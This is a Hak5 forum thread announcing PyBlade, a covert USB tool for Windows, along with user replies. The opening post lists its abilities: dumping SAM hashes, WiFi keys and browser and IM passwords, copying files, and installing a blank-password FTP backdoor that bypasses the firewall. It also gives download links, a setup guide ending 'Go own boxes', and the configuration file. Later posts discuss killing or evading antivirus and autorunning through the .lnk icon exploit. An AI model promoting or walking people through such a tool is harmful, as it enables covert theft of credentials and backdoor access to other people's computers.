Jump to content


Photo
- - - - -

Pyblade


  • Please log in to reply
93 replies to this topic

#1 sablefoxx

sablefoxx

    Hak5 Ninja

  • Active Members
  • PipPipPipPipPipPipPip
  • 572 posts
  • Gender:Male
  • Location:/Milkyway/Terran System/Earth/
  • Interests:Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Posted 10 August 2010 - 09:10 PM

PyBlade v0.3



About:
Some people have been asking for an updated switchblade to run on Vista/7 computers so I thought I'd throw something together. It's a work in progress, I'm also fairly new to Python so no making fun of my code biggrin.gif Please download and report bugs or requested features!

Current Abilities:
-Gathers system info, running processes, and local IP settings
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
-Keyboard Randomizer payload
-Landmine payload
-Emo Computer payload
-Rick Roll payload
-IE Homepage payload
-Save logs in .txt, .html, or .xml format
-U3 support via .u3p file
-Support for file slurping
-FTP backdoor installer (w/ XP Firewall bypass)


Planned Updates:

-Netcat backdoor installer
-AV Bypass / Evade
-Save all logs in .html / .xml format

Downloads:
PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bf
PyBlade Source Code v0.3 (Includes payloads' source code)
U3 Support (.u3p) *BETA*

*** Change Log ***

v0.1
-Gathers system info, running processes, and network connections
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)


v0.2
-Added Keyboard Randomizer payload
-Added Landmine payload
-Added Change IE homepage payload
-Added comments to code
-Changed sysinfo to collect local IP settings
-Added options to save logs as .txt, .html, or .xml
-Added U3 support
-Checks to see if Firefox is installed before dumping passwords


v0.3
-Added Emo Computer payload (harmless don't worry)
-Added Random Rick Roll payload
-Added support for file slurping
-Added icons for .exe's
-Added FTP Server backdoor
-Correctly sets file extensions when saving logs in .html/.xml
-Added ability to bypass XP Firewall, and hide exceptions from the GUI
-Added time stamps to log directories



*** Quick Setup Guide ***


Setup for Non-U3 Drives:
0. Obtain a USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root of your USB drive
3. Edit blade.conf to do your bidding (see below)
4. Go own boxes

Setup for Unmodified U3 Drives:
0. Obtain a U3 USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root the flash partition on the U3 drive
3. Edit blade.conf to do your bidding (see below)
4. Download F_Bex.u3p (see above)
5. Open the U3 menu, click "Add Programs" and "Install from My Computer"
6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted
7. Go own boxes

Configure Your Blade:
1. Open "blade.conf" in your favorite text editor (or notepad)
2. Enable/Disable programs by changing their execute value (Enable = 1)
Here are the default settings for v0.3:
CODE
# --------------------------------
#  SwitchBlade Configuration File
# --------------------------------

# Log File Type
#   Possible values; text, html, xml
log=html

# System Dumps
sysinfo=1
pwdump=1
wifi=1
mspass=1
iepw=1
iehist=1
ffpw=1
chromepw=1

# Payloads
keyrand=0
landmine=0
rickroll=0
emo=0

# Change IE Homepage
iehome=0
iehome_url=http://google.com

# Backdoors
ftpme=0


# File Slurping
#   Seperate multiple directories using;'s
slurp=0
slurp_dirs=C:\Files;C:\Files2

Note that lines starting with '#' are comments, and are ignored during execution, do NOT comment out lines to disable programs, just set their execute value to 0

3. Some lines contain strings;
logs= Change this to set how the log files are saved (.log, .html, .xml)
iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.
slurp_dirs= This is a list of the directories you want copied onto your drive, you can list multiple directories by separating them with semicolons
4. To manually execute run "bex.exe"

Payloads:
Keyboard Randomizer: This program randomizes all keyboard input while its running (keyrand).
Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine).
Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo).
FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme).
Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).
Note: All payloads are activated on reboot (except for FTPme).


Let me know if you find bugs, and come say hi on IRC!

Edited by sablefoxx, 23 August 2010 - 12:19 PM.

i7 860 @ 3.36GHz / P55 EVGA / 4Gb DDR3 / 2x GTX 460s in SLi / 2x1Tb RAID 0 / 40Gb Intel SSD

#2 okiwan

okiwan

    /* no comment */

  • Active Members
  • PipPipPipPipPipPipPip
  • 893 posts

Posted 10 August 2010 - 11:47 PM

wow you wernt joking. your the man! cant wait to try it out.
THANKS!
twitter - @OneAngryPenguin
http://okiwan.blogspot.com/


QUOTE
"Shannon what you got?"
"IM A BIRD!"

#3 sablefoxx

sablefoxx

    Hak5 Ninja

  • Active Members
  • PipPipPipPipPipPipPip
  • 572 posts
  • Gender:Male
  • Location:/Milkyway/Terran System/Earth/
  • Interests:Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Posted 11 August 2010 - 12:02 AM

Whoops, forgot a file you may want to re-download it, also just found a couple bugs, working on a fixes.


Edit --Fixed problems!

Edited by sablefoxx, 23 September 2010 - 08:08 PM.

i7 860 @ 3.36GHz / P55 EVGA / 4Gb DDR3 / 2x GTX 460s in SLi / 2x1Tb RAID 0 / 40Gb Intel SSD

#4 Jen

Jen

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 205 posts

Posted 11 August 2010 - 02:40 AM

I thought it stopped things from autorunning with .inf?

#5 sablefoxx

sablefoxx

    Hak5 Ninja

  • Active Members
  • PipPipPipPipPipPipPip
  • 572 posts
  • Gender:Male
  • Location:/Milkyway/Terran System/Earth/
  • Interests:Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Posted 11 August 2010 - 10:37 AM

QUOTE (Jen @ Wed, 11 Aug 2010 08:40:44 +0000) <{POST_SNAPBACK}>
I thought it stopped things from autorunning with .inf?


It should still work on XP, I'm working on getting the new .lnk icon exploit to run it on unpatched Vista/Seven computers, and U3 support.

Edited by sablefoxx, 11 August 2010 - 10:37 AM.

i7 860 @ 3.36GHz / P55 EVGA / 4Gb DDR3 / 2x GTX 460s in SLi / 2x1Tb RAID 0 / 40Gb Intel SSD

#6 m1k

m1k

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 91 posts
  • Gender:Male
  • Location:Italy

Posted 11 August 2010 - 12:14 PM

Well done Batman !!
wink.gif

#7 Zimmer

Zimmer

    Hak5 Ninja

  • Active Members
  • PipPipPipPipPipPipPip
  • 672 posts
  • Gender:Male

Posted 11 August 2010 - 03:19 PM

Nice!


#8 misfitsman805

misfitsman805

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 158 posts
  • Gender:Male
  • Location:Oxnard,CA

Posted 11 August 2010 - 03:35 PM

Nice! Keep up the good work man! Can't wait for future versions! XD
"Oh no! All of my pineapple code was on that! This is bad!" - Darren Kitchen

#9 IrishFavor

IrishFavor

    Hak5 Fan

  • Active Members
  • PipPip
  • 31 posts
  • Gender:Male
  • Location:Chicago, IL
  • Interests:Computers, modding, networking, systems administration, help desk, infosec, social engineering, lock picking, airsoft, paitball

Posted 13 August 2010 - 09:25 AM

so far looks great. thank you for all the work on this project.



#10 m1k

m1k

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 91 posts
  • Gender:Male
  • Location:Italy

Posted 14 August 2010 - 11:45 AM

It works on XP...
any Vista,Seven reports?

#11 xantos_gambit

xantos_gambit

    Hak5 Fan

  • Active Members
  • PipPip
  • 25 posts
  • Gender:Male

Posted 16 August 2010 - 05:50 PM

Pretty cool, needs a AV killer or something, most AVs destroy it before it gets a chance to do anything useful/

#12 sablefoxx

sablefoxx

    Hak5 Ninja

  • Active Members
  • PipPipPipPipPipPipPip
  • 572 posts
  • Gender:Male
  • Location:/Milkyway/Terran System/Earth/
  • Interests:Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Posted 16 August 2010 - 06:08 PM

Updated to v0.2, added payloads, and some other small stuff.

QUOTE (xantos_gambit @ Mon, 16 Aug 2010 22:50:03 +0000) <{POST_SNAPBACK}>
Pretty cool, needs a AV killer or something, most AVs destroy it before it gets a chance to do anything useful/


Hmm... I have yet to see this done well, perhaps I'll try something.

I could easily add an encrypted .rar where the files in question could be stored until after the AV has been killed or disabled.
"bex.exe" shouldn't be flagged VirusTotal

The problem is that killing AV software isn't as simple as making a taskkill system call, but perhaps we can disable it or crash it (without crashing the OS). The problem with this method is that we can only target specific titles.

Edited by sablefoxx, 16 August 2010 - 10:09 PM.

i7 860 @ 3.36GHz / P55 EVGA / 4Gb DDR3 / 2x GTX 460s in SLi / 2x1Tb RAID 0 / 40Gb Intel SSD

#13 Mr. Stuky

Mr. Stuky

    Hak5 Fan +

  • Active Members
  • PipPipPip
  • 62 posts
  • Gender:Male
  • Location:Lynwood

Posted 16 August 2010 - 10:49 PM

Sorry for my noobness, but can you make a tutorial how to use these scripts? And hwo to make it work with U3 FlashDrive. thanks and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman

#14 sablefoxx

sablefoxx

    Hak5 Ninja

  • Active Members
  • PipPipPipPipPipPipPip
  • 572 posts
  • Gender:Male
  • Location:/Milkyway/Terran System/Earth/
  • Interests:Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Posted 16 August 2010 - 11:08 PM

QUOTE (Mr. Stuky @ Tue, 17 Aug 2010 04:49:04 +0000) <{POST_SNAPBACK}>
Sorry for my noobness, but can you make a tutorial how to use these scripts? And hwo to make it work with U3 FlashDrive. thanks and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman


I'll throw something together, brb.
i7 860 @ 3.36GHz / P55 EVGA / 4Gb DDR3 / 2x GTX 460s in SLi / 2x1Tb RAID 0 / 40Gb Intel SSD

#15 Mr. Stuky

Mr. Stuky

    Hak5 Fan +

  • Active Members
  • PipPipPip
  • 62 posts
  • Gender:Male
  • Location:Lynwood

Posted 16 August 2010 - 11:45 PM

Thanks, Really appreciated. Btw Added you so we can TF2 Sometime. ;]

#16 Jen

Jen

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 205 posts

Posted 17 August 2010 - 02:24 AM

I noticed you removed the .ink icon exploit as part of your planned features. Is it impossible to impliment it?

#17 sablefoxx

sablefoxx

    Hak5 Ninja

  • Active Members
  • PipPipPipPipPipPipPip
  • 572 posts
  • Gender:Male
  • Location:/Milkyway/Terran System/Earth/
  • Interests:Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Posted 17 August 2010 - 06:14 AM

QUOTE (Jen @ Tue, 17 Aug 2010 07:24:04 +0000) <{POST_SNAPBACK}>
I noticed you removed the .ink icon exploit as part of your planned features. Is it impossible to implement it?


More difficult then originally anticipated, may add it later.
i7 860 @ 3.36GHz / P55 EVGA / 4Gb DDR3 / 2x GTX 460s in SLi / 2x1Tb RAID 0 / 40Gb Intel SSD

#18 m1k

m1k

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 91 posts
  • Gender:Male
  • Location:Italy

Posted 17 August 2010 - 07:23 AM

Antivirus disabling....
also if my Avira dosn't see anything....
wink.gif

#19 w1ldf1re

w1ldf1re

    Hackling

  • Active Members
  • Pip
  • 11 posts

Posted 17 August 2010 - 01:26 PM

Awesome that you're now using Python!
I've been doing a course in it at university and it's nice to be able to see what you're doing in your programs and to be able to fix any errors that I get.

Hope I can contribute at some stage.

smile.gif

#20 w1ldf1re

w1ldf1re

    Hackling

  • Active Members
  • Pip
  • 11 posts

Posted 17 August 2010 - 02:42 PM

(delete)

Edited by w1ldf1re, 17 August 2010 - 02:55 PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users